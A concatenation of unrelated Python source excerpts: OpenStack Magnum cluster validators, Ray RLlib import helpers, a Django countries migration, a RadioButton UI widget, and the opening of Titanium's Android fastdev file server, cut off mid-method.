if storage_driver == 'devicemapper':
if not volume_size or volume_size < 3:
raise exception.InvalidParameterValue(
'docker volume size %s GB is not valid, '
'expecting minimum value 3GB for %s storage '
'driver.' % (volume_size, storage_driver))
def validate_cluster_properties(delta):
update_disallowed_properties = delta - cluster_update_allowed_properties
if update_disallowed_properties:
err = (_("cannot change cluster property(ies) %s.") %
", ".join(update_disallowed_properties))
raise exception.InvalidParameterValue(err=err)
def validate_federation_properties(delta):
update_disallowed_properties = delta - federation_update_allowed_properties
if update_disallowed_properties:
err = (_("cannot change federation property(ies) %s.") %
", ".join(update_disallowed_properties))
raise exception.InvalidParameterValue(err=err)
class Validator(object):
@classmethod
def get_coe_validator(cls, coe):
if coe == 'kubernetes':
return K8sValidator()
elif coe == 'swarm' or coe == 'swarm-mode':
return SwarmValidator()
elif coe == 'mesos':
return MesosValidator()
else:
raise exception.InvalidParameterValue(
_('Requested COE type %s is not supported.') % coe)
@classmethod
def validate_network_driver(cls, driver):
cls._validate_network_driver_supported(driver)
cls._validate_network_driver_allowed(driver)
@classmethod
def _validate_network_driver_supported(cls, driver):
"""Confirm that driver is supported by Magnum for this COE."""
if driver not in cls.supported_network_drivers:
raise exception.InvalidParameterValue(_(
'Network driver type %(driver)s is not supported, '
'expecting a %(supported_drivers)s network driver.') % {
'driver': driver,
'supported_drivers': '/'.join(
cls.supported_network_drivers + ['unspecified'])})
@classmethod
def _validate_network_driver_allowed(cls, driver):
"""Confirm that driver is allowed via configuration for this COE."""
if ('all' not in cls.allowed_network_drivers and
driver not in cls.allowed_network_drivers):
raise exception.InvalidParameterValue(_(
'Network driver type %(driver)s is not allowed, '
'expecting a %(allowed_drivers)s network driver. ') % {
'driver': driver,
'allowed_drivers': '/'.join(
cls.allowed_network_drivers + ['unspecified'])})
@classmethod
def validate_volume_driver(cls, driver):
cls._validate_volume_driver_supported(driver)
@classmethod
def _validate_volume_driver_supported(cls, driver):
"""Confirm that volume driver is supported by Magnum for this COE."""
if driver not in cls.supported_volume_driver:
raise exception.InvalidParameterValue(_(
'Volume driver type %(driver)s is not supported, '
'expecting a %(supported_volume_driver)s volume driver.') % {
'driver': driver,
'supported_volume_driver': '/'.join(
cls.supported_volume_driver + ['unspecified'])})
@classmethod
def validate_server_type(cls, server_type):
cls._validate_server_type(server_type)
@classmethod
def _validate_server_type(cls, server_type):
"""Confirm that server type is supported by Magnum for this COE."""
if server_type not in cls.supported_server_types:
raise exception.InvalidParameterValue(_(
'Server type %(server_type)s is not supported, '
'expecting a %(supported_server_types)s server type.') % {
'server_type': server_type,
'supported_server_types': '/'.join(
cls.supported_server_types + ['unspecified'])})
class K8sValidator(Validator):
supported_network_drivers = ['flannel', 'calico']
supported_server_types = ['vm', 'bm']
allowed_network_drivers = (
CONF.cluster_template.kubernetes_allowed_network_drivers)
default_network_driver = (
CONF.cluster_template.kubernetes_default_network_driver)
supported_volume_driver = ['cinder']
class SwarmValidator(Validator):
supported_network_drivers = ['docker', 'flannel']
supported_server_types = ['vm', 'bm']
allowed_network_drivers = (CONF.cluster_template.
swarm_allowed_network_drivers)
default_network_driver = (CONF.cluster_template.
swarm_default_network_driver)
supported_volume_driver = ['rexray']
class MesosValidator(Validator):
supported_network_drivers = ['docker']
supported_server_types = ['vm', 'bm']
allowed_network_drivers = (CONF.cluster_template.
mesos_allowed_network_drivers)
default_network_driver = (CONF.cluster_template.
mesos_default_network_driver)
supported_volume_driver = ['rexray']
| |
import logging
import os
import sys
from typing import Any, Optional
from ray.rllib.utils.typing import TensorStructType, TensorShape, TensorType
logger = logging.getLogger(__name__)
# Represents a generic tensor type.
TensorType = TensorType
# Either a plain tensor, or a dict or tuple of tensors (or StructTensors).
TensorStructType = TensorStructType
def try_import_tf(error=False):
"""Tries importing tf and returns the module (or None).
Args:
error (bool): Whether to raise an error if tf cannot be imported.
Returns:
Tuple:
- tf1.x module (either from tf2.x.compat.v1 OR as tf1.x).
- tf module (resulting from `import tensorflow`).
Either tf1.x or 2.x.
- The actually installed tf version as int: 1 or 2.
Raises:
ImportError: If error=True and tf is not installed.
"""
# Make sure, these are reset after each test case
# that uses them: del os.environ["RLLIB_TEST_NO_TF_IMPORT"]
if "RLLIB_TEST_NO_TF_IMPORT" in os.environ:
logger.warning("Not importing TensorFlow for test purposes")
return None, None, None
if "TF_CPP_MIN_LOG_LEVEL" not in os.environ:
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
# Try to reuse already imported tf module. This will avoid going through
# the initial import steps below and thereby switching off v2_behavior
# (switching off v2 behavior twice breaks all-framework tests for eager).
was_imported = False
if "tensorflow" in sys.modules:
tf_module = sys.modules["tensorflow"]
was_imported = True
else:
try:
import tensorflow as tf_module
except ImportError as e:
if error:
raise e
return None, None, None
# Try "reducing" tf to tf.compat.v1.
try:
tf1_module = tf_module.compat.v1
if not was_imported:
tf1_module.disable_v2_behavior()
# No compat.v1 -> return tf as is.
except AttributeError:
tf1_module = tf_module
if not hasattr(tf_module, "__version__"):
version = 1 # sphinx doc gen
else:
version = 2 if "2." in tf_module.__version__[:2] else 1
return tf1_module, tf_module, version
def tf_function(tf_module):
"""Conditional decorator for @tf.function.
Use @tf_function(tf) instead to avoid errors if tf is not installed."""
# The actual decorator to use (pass in `tf` (which could be None)).
def decorator(func):
# If tf not installed -> return function as is (won't be used anyways).
if tf_module is None or tf_module.executing_eagerly():
return func
# If tf installed, return @tf.function-decorated function.
return tf_module.function(func)
return decorator
def try_import_tfp(error=False):
"""Tries importing tfp and returns the module (or None).
Args:
error (bool): Whether to raise an error if tfp cannot be imported.
Returns:
The tfp module.
Raises:
ImportError: If error=True and tfp is not installed.
"""
if "RLLIB_TEST_NO_TF_IMPORT" in os.environ:
logger.warning("Not importing TensorFlow Probability for test "
"purposes.")
return None
try:
import tensorflow_probability as tfp
return tfp
except ImportError as e:
if error:
raise e
return None
# Fake module for torch.nn.
class NNStub:
def __init__(self, *a, **kw):
# Fake nn.functional module within torch.nn.
self.functional = None
self.Module = ModuleStub
# Fake class for torch.nn.Module to allow it to be inherited from.
class ModuleStub:
def __init__(self, *a, **kw):
raise ImportError("Could not import `torch`.")
def try_import_torch(error=False):
"""Tries importing torch and returns the module (or None).
Args:
error (bool): Whether to raise an error if torch cannot be imported.
Returns:
tuple: torch AND torch.nn modules.
Raises:
ImportError: If error=True and PyTorch is not installed.
"""
if "RLLIB_TEST_NO_TORCH_IMPORT" in os.environ:
logger.warning("Not importing PyTorch for test purposes.")
return _torch_stubs()
try:
import torch
import torch.nn as nn
return torch, nn
except ImportError as e:
if error:
raise e
return _torch_stubs()
def _torch_stubs():
nn = NNStub()
return None, nn
def get_variable(value,
framework: str = "tf",
trainable: bool = False,
tf_name: str = "unnamed-variable",
torch_tensor: bool = False,
device: Optional[str] = None,
shape: Optional[TensorShape] = None,
dtype: Optional[Any] = None):
"""
Args:
value (any): The initial value to use. In the non-tf case, this will
be returned as is. In the tf case, this could be a tf-Initializer
object.
framework (str): One of "tf", "torch", or None.
trainable (bool): Whether the generated variable should be
trainable (tf)/require_grad (torch) or not (default: False).
tf_name (str): For framework="tf": An optional name for the
tf.Variable.
torch_tensor (bool): For framework="torch": Whether to actually create
a torch.tensor, or just a python value (default).
device (Optional[torch.Device]): An optional torch device to use for
the created torch tensor.
shape (Optional[TensorShape]): An optional shape to use iff `value`
does not have any (e.g. if it's an initializer w/o explicit value).
dtype (Optional[TensorType]): An optional dtype to use iff `value` does
not have any (e.g. if it's an initializer w/o explicit value).
Returns:
any: A framework-specific variable (tf.Variable, torch.tensor, or
python primitive).
"""
if framework in ["tf", "tfe"]:
import tensorflow as tf
dtype = dtype or getattr(
value, "dtype", tf.float32
if isinstance(value, float) else tf.int32
if isinstance(value, int) else None)
return tf.compat.v1.get_variable(
tf_name,
initializer=value,
dtype=dtype,
trainable=trainable,
**({} if shape is None else {
"shape": shape
}))
elif framework == "torch" and torch_tensor is True:
torch, _ = try_import_torch()
var_ = torch.from_numpy(value)
if dtype == torch.float32:
var_ = var_.float()
elif dtype == torch.int32:
var_ = var_.int()
if device:
var_ = var_.to(device)
var_.requires_grad = trainable
return var_
# torch or None: Return python primitive.
return value
def get_activation_fn(name, framework="tf"):
"""Returns a framework specific activation function, given a name string.
Args:
name (str): One of "relu" (default), "tanh", or "linear".
framework (str): One of "tf" or "torch".
Returns:
A framework-specific activtion function. e.g. tf.nn.tanh or
torch.nn.ReLU. None if name in ["linear", None].
Raises:
ValueError: If name is an unknown activation function.
"""
if framework == "torch":
if name in ["linear", None]:
return None
if name == "swish":
from ray.rllib.utils.torch_ops import Swish
return Swish
_, nn = try_import_torch()
if name == "relu":
return nn.ReLU
elif name == "tanh":
return nn.Tanh
else:
if name in ["linear", None]:
return None
tf1, tf, tfv = try_import_tf()
fn = getattr(tf.nn, name, None)
if fn is not None:
return fn
raise ValueError("Unknown activation ({}) for framework={}!".format(
name, framework))
| |
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-29 16:55
from __future__ import unicode_literals
import countries.fields
import django.contrib.gis.db.models.fields
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Continent',
fields=[
('code', countries.fields.CodeISOField(length=2, max_length=2, primary_key=True, regex='[A-Z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[A-Z]{2}$')], verbose_name='code')),
('name', models.CharField(max_length=16, verbose_name='name')),
],
options={
'verbose_name': 'continent',
'verbose_name_plural': 'continents',
'ordering': ('code',),
},
),
migrations.CreateModel(
name='Country',
fields=[
('cca2', countries.fields.CodeISOField(length=2, max_length=2, primary_key=True, regex='[A-Z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[A-Z]{2}$')], verbose_name='code ISO 3166-1 alpha-2')),
('cca3', countries.fields.CodeISOField(length=3, max_length=3, regex='[A-Z]', validators=[django.core.validators.RegexValidator(regex='^[A-Z]{3}$')], verbose_name='code ISO 3166-1 alpha-3')),
('ccn3', countries.fields.CodeISOField(length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='code ISO 3166-1 numeric')),
('cioc', countries.fields.CodeISOField(length=3, max_length=3, regex='[A-Z]', validators=[django.core.validators.RegexValidator(regex='^[A-Z]{3}$')], verbose_name='code International Olympic Committee')),
('location', django.contrib.gis.db.models.fields.PointField(null=True, srid=4326)),
('mpoly', django.contrib.gis.db.models.fields.MultiPolygonField(null=True, srid=4326)),
('region', models.CharField(max_length=64, verbose_name='region')),
('region_code', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='region code')),
('subregion', models.CharField(max_length=64, verbose_name='subregion')),
('subregion_code', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='subregion code')),
('world_region', countries.fields.CodeISOField(blank=True, length=4, max_length=4, regex='[A-Z]', validators=[django.core.validators.RegexValidator(regex='^[A-Z]{4}$')], verbose_name='world region code')),
('postal_code', models.NullBooleanField()),
('capital', models.CharField(max_length=128, verbose_name='capital')),
('independent', models.CharField(blank=True, max_length=64, verbose_name='independent')),
('landlocked', models.BooleanField(verbose_name='landlocked status')),
('demonym', models.CharField(max_length=64, verbose_name='name of residents')),
('area', models.PositiveIntegerField(null=True, verbose_name='land area in km')),
('extra', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
('calling_codes', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=8, validators=[django.core.validators.RegexValidator(regex='^\\d+$')]), size=None, verbose_name='calling codes')),
('international_prefix', models.CharField(blank=True, max_length=4, verbose_name='international prefix')),
('national_destination_code_lengths', django.contrib.postgres.fields.ArrayField(base_field=models.PositiveSmallIntegerField(), null=True, size=None, verbose_name='national destination code lengths')),
('national_number_lengths', django.contrib.postgres.fields.ArrayField(base_field=models.PositiveSmallIntegerField(), null=True, size=None, verbose_name='national number lengths')),
('national_prefix', models.CharField(blank=True, max_length=4, verbose_name='national prefix')),
('alt_spellings', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=128), size=None, verbose_name='alternative spellings')),
('tlds', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=16), size=None, verbose_name='country code top-level domains')),
('borders', models.ManyToManyField(blank=True, related_name='_country_borders_+', to='countries.Country', verbose_name='land borders')),
('continent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='countries.Continent', verbose_name='continent')),
],
options={
'verbose_name': 'country',
'verbose_name_plural': 'countries',
'ordering': ('cca2',),
},
),
migrations.CreateModel(
name='CountryName',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('common', models.CharField(max_length=128, verbose_name='common name')),
('official', models.CharField(max_length=128, verbose_name='official name')),
('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='names', to='countries.Country', verbose_name='country')),
],
options={
'verbose_name': 'country name',
'verbose_name_plural': 'country names',
'ordering': ('country', 'language'),
},
),
migrations.CreateModel(
name='Currency',
fields=[
('code', countries.fields.CodeISOField(length=3, max_length=3, primary_key=True, regex='[A-Z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[A-Z]{3}$')], verbose_name='code ISO 4217')),
('numeric', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='code ISO 4217 numeric')),
('name', models.CharField(max_length=64, verbose_name='name')),
('full_name', models.CharField(blank=True, max_length=64, verbose_name='full name')),
('minor_unit', models.PositiveSmallIntegerField(blank=True, null=True)),
('symbol', models.CharField(blank=True, max_length=4, verbose_name='symbol')),
('unicode_hex', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=8), null=True, size=None, verbose_name='unicode hex')),
],
options={
'verbose_name': 'currency',
'verbose_name_plural': 'currencies',
'ordering': ('code',),
},
),
migrations.CreateModel(
name='Division',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(db_index=True, max_length=8, verbose_name='code')),
('name', models.CharField(max_length=128, verbose_name='name')),
('alt_names', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=128), size=None, verbose_name='alternative names')),
('location', django.contrib.gis.db.models.fields.PointField(null=True, srid=4326)),
('poly', django.contrib.gis.db.models.fields.PolygonField(null=True, srid=4326)),
('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='divisions', to='countries.Country', verbose_name='country')),
],
options={
'verbose_name': 'division',
'verbose_name_plural': 'divisions',
'ordering': ('country', 'code'),
},
),
migrations.CreateModel(
name='Language',
fields=[
('name', models.CharField(max_length=64, verbose_name='name')),
('cla3', countries.fields.CodeISOField(length=3, max_length=3, primary_key=True, regex='[a-z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[a-z]{3}$')], verbose_name='language code ISO 639-3')),
('cla2', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='[a-z]', validators=[django.core.validators.RegexValidator(regex='^[a-z]{3}$')], verbose_name='language code ISO 639-1')),
],
options={
'verbose_name': 'language',
'verbose_name_plural': 'languages',
'ordering': ('cla3',),
},
),
migrations.CreateModel(
name='Locale',
fields=[
('code', models.CharField(max_length=16, primary_key=True, serialize=False, verbose_name='code')),
('country', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='locales', to='countries.Country', verbose_name='country')),
('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='locales', to='countries.Language', verbose_name='language')),
],
options={
'verbose_name': 'locale',
'verbose_name_plural': 'locales',
'ordering': ('code',),
},
),
migrations.CreateModel(
name='Timezone',
fields=[
('name', models.CharField(max_length=128, primary_key=True, serialize=False, verbose_name='name')),
],
options={
'verbose_name': 'timezone',
'verbose_name_plural': 'timezones',
'ordering': ('name',),
},
),
migrations.CreateModel(
name='Translation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_id', models.CharField(db_index=True, max_length=64, verbose_name='content ID')),
('text', models.CharField(max_length=128, verbose_name='text')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='content type')),
('locale', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='countries.Locale', verbose_name='locale')),
],
options={
'verbose_name': 'translation',
'verbose_name_plural': 'translations',
'ordering': ('content_type', 'object_id', 'locale'),
},
),
migrations.AddField(
model_name='countryname',
name='language',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='countries.Language', verbose_name='language'),
),
migrations.AddField(
model_name='country',
name='currencies',
field=models.ManyToManyField(to='countries.Currency', verbose_name='currencies'),
),
migrations.AddField(
model_name='country',
name='languages',
field=models.ManyToManyField(to='countries.Language', verbose_name='official languages'),
),
migrations.AddField(
model_name='country',
name='timezones',
field=models.ManyToManyField(to='countries.Timezone', verbose_name='timezones'),
),
migrations.AlterUniqueTogether(
name='translation',
unique_together=set([('content_type', 'object_id', 'locale')]),
),
migrations.AlterUniqueTogether(
name='division',
unique_together=set([('code', 'country')]),
),
migrations.AlterUniqueTogether(
name='countryname',
unique_together=set([('country', 'language')]),
),
]
| |
import _dk_core as core
import math
from .. import blendstate
from . import view
from . import font
from . import control
class RadioButton(control.Control, view.View):
radius = 8
circleBorder = 1
innerCircleRadius = 5
leftMargin = 4
rightMargin = 0
padding = 8
circleBorderColor = core.Color(0.4, 0.4, 0.4)
circleColor = core.Color(0.9, 0.9, 1.0)
circleColorHighlighted = core.Color(0.8, 0.8, 1.0)
circleColorActivated = core.Color(0.6, 0.6, 1.0)
circleColorDisabled = core.Color(0.6, 0.6, 0.6)
innerCircleColor = core.Color(0.25, 0.25, 0.25)
innerCircleColorHighlighted = core.Color(0.25, 0.25, 1.0)
innerCircleColorActivated = core.Color(0.0, 0.0, 0.6)
innerCircleColorDisabled = core.Color(0.2, 0.2, 0.2)
textColor = core.Color(0.0, 0.0, 0.0)
textColorHighlighted = core.Color(0.0, 0.0, 0.0)
textColorActivated = core.Color(0.0, 0.0, 0.7)
textColorDisabled = core.Color(0.3, 0.3, 0.3)
outlineColor = None
outlineColorHighlighted = None
outlineColorActivated = None
outlineColorDisabled = None
backgroundColor = core.Color(1, 1, 1)
fontAttributes = font.attributes(14)
interactOnlyInsideVisibleContentRect = True
minimumViewWidth = (radius + circleBorder) * 2
minimumViewHeight = (radius + circleBorder) * 2
def __init__(self, text, group, *args, **kwargs):
super().__init__(*args, **kwargs)
self.text = str(text)
self.group = group
self.__selected = False
self.__mouseHover = False
self.__activated = False
self.__capturedMouseId = None
self.__interactFrame = None
def onLoaded(self):
super().onLoaded()
def onUnload(self):
super().onUnload()
def onRender(self, renderer):
super().onRender(renderer)
state = self.STATE_DISABLED if not self.enabled else \
self.STATE_ACTIVATED if self.__activated else \
self.STATE_HIGHLIGHTED if self.__mouseHover else \
self.STATE_NORMAL
bounds = self.contentBounds()
# draw circle
circleRect = core.Rect(bounds.x + self.circleBorder + self.leftMargin,
bounds.y + bounds.height * 0.5 - self.radius,
self.radius * 2, self.radius * 2)
circleRect.x = math.floor(circleRect.x * self.scaleFactor) / self.scaleFactor
circleRect.y = math.floor(circleRect.y * self.scaleFactor) / self.scaleFactor
if self.circleBorder > 0:
rc = core.Rect(circleRect)
rc.origin = rc.x - self.circleBorder, rc.y - self.circleBorder
rc.size = rc.width + self.circleBorder*2, rc.height + self.circleBorder*2
with renderer.contextForSolidEllipses(self.circleBorderColor) as r:
r.add(rc)
circleColor = (self.circleColor,
self.circleColorHighlighted,
self.circleColorActivated,
self.circleColorDisabled)[state]
with renderer.contextForSolidEllipses(circleColor) as r:
r.add(circleRect)
if self.__selected:
r = self.radius - self.innerCircleRadius
innerCircleRect = core.Rect(circleRect.x + r, circleRect.y + r,
self.innerCircleRadius * 2, self.innerCircleRadius * 2)
innerCircleColor = (self.innerCircleColor,
self.innerCircleColorHighlighted,
self.innerCircleColorActivated,
self.innerCircleColorDisabled)[state]
with renderer.contextForSolidEllipses(innerCircleColor, blend=blendstate.defaultOpaque) as r:
r.add(innerCircleRect)
# draw text
textRect = core.Rect(circleRect.x + circleRect.width + self.circleBorder + self.padding,
bounds.y,
0,
bounds.height)
lineWidth = self.font.lineWidth(self.text)
lineHeight = self.font.lineHeight()
textRect.width = min(bounds.x + bounds.width - textRect.x - self.rightMargin, lineWidth)
# with renderer.contextForSolidRects(core.Color(1,0,0), blend=blendstate.defaultOpaque) as r:
# r.add(textRect)
textColor = (self.textColor,
self.textColorHighlighted,
self.textColorActivated,
self.textColorDisabled)[state]
outlineColor = (self.outlineColor,
self.outlineColorHighlighted,
self.outlineColorActivated,
self.outlineColorDisabled)[state]
font.drawText(renderer, textRect, self.text, self.font,
textColor, outlineColor,
align=font.ALIGN_LEFT,
linebreak=font.LINE_BREAK_TRUNCATING_TAIL,
blend=blendstate.defaultAlpha)
if self.interactOnlyInsideVisibleContentRect:
x1 = circleRect.x - self.circleBorder - self.padding
x2 = textRect.x + textRect.width + self.padding
textOriginY = bounds.y + (bounds.height - lineHeight) * 0.5
y1 = min(circleRect.y - self.circleBorder, textOriginY) - self.padding
y2 = max(circleRect.y + circleRect.height, textOriginY + lineHeight) + self.padding
self.__interactFrame = core.Rect(x1, y1, x2 - x1, y2 - y1)
else:
self.__interactFrame = bounds
def onMouseDown(self, deviceId, buttonId, pos):
super().onMouseDown(deviceId, buttonId, pos)
if self.__capturedMouseId:
if not self.isMouseCapturedBySelf(self.__capturedMouseId[0]):
self.__capturedMouseId = None
if self.__capturedMouseId is None:
if self.__interactFrame and self.__interactFrame.isInside(pos):
self.captureMouse(deviceId)
self.__capturedMouseId = (deviceId, buttonId)
self.__activated = True
self.redraw()
def onMouseUp(self, deviceId, buttonId, pos):
super().onMouseUp(deviceId, buttonId, pos)
if self.__capturedMouseId and self.__capturedMouseId == (deviceId, buttonId):
self.releaseMouse(deviceId)
if self.__interactFrame and self.__interactFrame.isInside(pos):
self.setSelected()
self.__capturedMouseId = None
self.__activated = False
self.redraw()
def onMouseMove(self, deviceId, pos, delta):
super().onMouseMove(deviceId, pos, delta)
if self.__capturedMouseId and self.__capturedMouseId[0] == deviceId:
act = self.__activated
if self.isMouseCapturedBySelf(deviceId):
if self.__interactFrame:
self.__activated = self.__interactFrame.isInside(pos)
else:
self.__activated = False
else:
self.__capturedMouseId = None
self.__activated = False
if act != self.__activated:
self.redraw()
elif deviceId == 0:
h = self.__mouseHover
self.__mouseHover = self.__interactFrame.isInside(pos) if self.__interactFrame else False
if self.__mouseHover != h:
self.redraw()
def onMouseLeave(self, deviceId):
super().onMouseLeave(deviceId)
if deviceId == 0 and self.__mouseHover:
self.__mouseHover = False
self.redraw()
def siblings(self):
parent = self.parent()
s = []
if parent and self.group is not None:
for c in parent.children():
if c is not self and isinstance(c, RadioButton):
if c.group == self.group:
s.append(c)
return s
@property
def selected(self):
return self.__selected
def setSelected(self):
if not self.__selected:
self.__selected = True
parent = self.parent()
if parent and self.group is not None:
for c in parent.children():
if c is not self and isinstance(c, RadioButton):
if c.group == self.group:
if c.__selected:
c.__selected = False
c.redraw()
self.redraw()
# post event
screen = self.screen()
if screen:
screen.postOperation(self.postEvent, ())
def postEvent(self):
super().invokeAllTargets(self)
def addItems(view, items, rect, columns=1, selectedItemIndex=0, group=None):
if group is None:
group = object()
buttons = []
numItems = len(items)
columns = max(columns, 1)
rows = math.ceil(numItems / columns)
width = rect.width / columns
height = rect.height / rows
count = 0
for v in items:
col = count % columns
row = int(count / columns)
rc = core.Rect(rect.x + width * col, rect.y + height * row, width, height)
item = RadioButton(v, group, frame=rc)
buttons.append(item)
count += 1
try:
button = buttons[selectedItemIndex]
button.setSelected()
except IndexError:
pass
if view is not None:
for item in buttons:
view.addChild(item)
return buttons
| |
#
# Appcelerator Titanium Mobile
# Copyright (c) 2011-2012 by Appcelerator, Inc. All Rights Reserved.
# Licensed under the terms of the Apache Public License
# Please see the LICENSE included with this distribution for details.
#
# A custom server that speeds up development time in Android significantly
import os, sys, time, optparse, logging
import urllib, threading
import SocketServer, socket, struct, codecs
import platform, mimetypes
# we use our compatibility code for python 2.5
if sys.version_info < (2, 6):
from tcpserver import TCPServer
else:
from SocketServer import TCPServer
logging.basicConfig(format='[%(levelname)s] [%(asctime)s] %(message)s', level=logging.INFO)
support_android_dir = os.path.dirname(os.path.abspath(__file__))
support_dir = os.path.dirname(support_android_dir)
sys.path.append(support_dir)
sys.path.append(os.path.join(support_dir, "common"))
import tiapp, simplejson
server = None
request_count = 0
start_time = time.time()
idle_thread = None
is_windows = (platform.system() == 'Windows')
utf8_codec = codecs.lookup("utf-8")
def pack_int(i):
return struct.pack("!i", i)
def send_tokens(socket, *tokens):
buffer = pack_int(len(tokens))
for token in tokens:
buffer += pack_int(len(token))
buffer += token
socket.sendall(buffer)
def read_int(socket):
data = socket.recv(4)
if not data: return None
return struct.unpack("!i", data)[0]
def read_tokens(socket):
token_count = read_int(socket)
if token_count == None: return None
tokens = []
for i in range(0, token_count):
length = read_int(socket)
data = socket.recv(length)
tokens.append(data)
return tokens
def should_open_binary(path):
if not is_windows:
return False
p = path.lower()
(base, ext) = os.path.splitext(p)
if not ext:
return True
# Some quick exit possibilities.
if ext in (".js", ".jss", ".html", ".xml", ".htm", ".txt", ".css", ".json"):
return False
if ext in (".gif", ".bmp", ".png", ".jpg", ".jpeg", ".db", ".mp3", ".mov", ".wav", ".mpg", ".mpeg", ".3gp", ".3gpp", ".m4a", ".mp4", ".flac", ".ogg"):
return True
(mime_type, encoding) = mimetypes.guess_type(p)
if mime_type and mime_type.startswith("text"):
return False
else:
return True
""" A simple idle checker thread """
class IdleThread(threading.Thread):
def __init__(self, max_idle_time):
super(IdleThread, self).__init__()
self.idle_time = 0
self.max_idle_time = max_idle_time
self.running = True
def clear_idle_time(self):
self.idle_lock.acquire()
self.idle_time = 0
self.idle_lock.release()
def run(self):
self.idle_lock = threading.Lock()
while self.running:
if self.idle_time < self.max_idle_time:
time.sleep(1)
self.idle_lock.acquire()
self.idle_time += 1
self.idle_lock.release()
else:
logging.info("Shutting down Fastdev server due to idle timeout: %s" % self.idle_time)
server.shutdown()
self.running = False
"""
A handler for fastdev requests.
The fastdev server uses a simple binary protocol comprised of messages and tokens.
Without a valid handshake, no requests will be processed.
Currently supported commands are:
- "handshake" <guid> : Application handshake
- "script-handshake" <guid> : Script control handshake
- "get" <Resources relative path> : Get the contents of a file from the Resources folder
- "kill-app" : Kills the connected app's process
- "restart-app" : Restarts the connected app's process
-"shutdown" : Shuts down the server
Right now the VFS rules for "get" are:
- Anything under "Resources" is served as is
- Anything under "Resources/android" overwrites anything under "Resources" (and is mapped to the root)
"""
class FastDevHandler(SocketServer.BaseRequestHandler):
resources_dir = None
handshake = None
app_handler = None
def handle(self):
logging.info("connected: %s:%d" % self.client_address)
global request_count
self.valid_handshake = False
self.request.settimeout(1.0)
while True:
try:
tokens = read_tokens(self.request)
if tokens == None:
break
except socket.timeout, e:
# only break the loop when not serving, otherwise timeouts are normal
serving = False
if sys.version_info < (2, 6):
serving = server.is_serving()
elif sys.version_info < (2, 7):
serving = server._BaseServer__serving
else:
serving = not server._BaseServer__is_shut_down.isSet()
if not serving:
break
else: continue
idle_thread.clear_idle_time()
command = tokens[0]
if command == "handshake":
FastDevHandler.app_handler = self
self.handle_handshake(tokens[1])
elif command == "script-handshake":
self.handle_handshake(tokens[1])
else:
if not self.valid_handshake:
self.send_tokens("Invalid Handshake")
break
if command == "length":
request_count += 1
self.handle_length(tokens[1])
elif command == "exists":
request_count += 1
self.handle_exists(tokens[1])
elif command == "get":
request_count += 1
self.handle_get(tokens[1])
elif command == "kill-app":
self.handle_kill_app()
break
elif command == "restart-app":
self.handle_restart_app()
break
elif command == "status":
self.handle_status()
elif command == "shutdown":
self.handle_shutdown()
break
logging.info("disconnected: %s:%d" % self.client_address)
def handle_handshake(self, handshake):
logging.info("handshake: %s" % handshake)
if handshake == self.handshake:
self.send_tokens("OK")
self.valid_handshake = True
else:
logging.warn("handshake: invalid handshake sent, rejecting")
self.send_tokens("Invalid Handshake")
def get_resource_path(self, relative_path):
android_path = os.path.join(self.resources_dir, 'android', relative_path)
path = os.path.join(self.resources_dir, relative_path)
if os.path.exists(android_path):
return android_path
elif os.path.exists(path):
return path
else:
return None
def handle_length(self, relative_path):
path = self.get_resource_path(relative_path)
if path != None:
length = os.path.getsize(path)
logging.info("length %s: %d" % (relative_path, length))
self.send_tokens(pack_int(length))
else:
logging.info("length %s: path not found" % relative_path)
self.send_tokens(pack_int(-1))
def handle_exists(self, relative_path):
path = self.get_resource_path(relative_path)
if path != None:
logging.info("%s exists: true" % relative_path)
self.send_tokens(pack_int(1))
else:
logging.info("%s exists: false" % relative_path)
self.send_tokens(pack_int(0))
def handle_get(self, relative_path):
path = self.get_resource_path(relative_path)
if path is None:
logging.warn("get %s: path not found" % relative_path)
self.send_tokens("NOT_FOUND")
return
if os.path.isfile(path) is False:
logging.warn("get %s: path is a directory" % relative_path)
self.send_tokens("NOT_FOUND")
return
logging.info("get %s: %s" % (relative_path, path))
self.send_file(path)
def send_tokens(self, *tokens):
send_tokens(self.request, *tokens)
def send_file(self, path):
mode = 'r'
if should_open_binary(path):
mode += 'b'
buffer = open(path, mode).read()
self.send_tokens(buffer)
def handle_kill_app(self):
logging.info("request: kill-app")
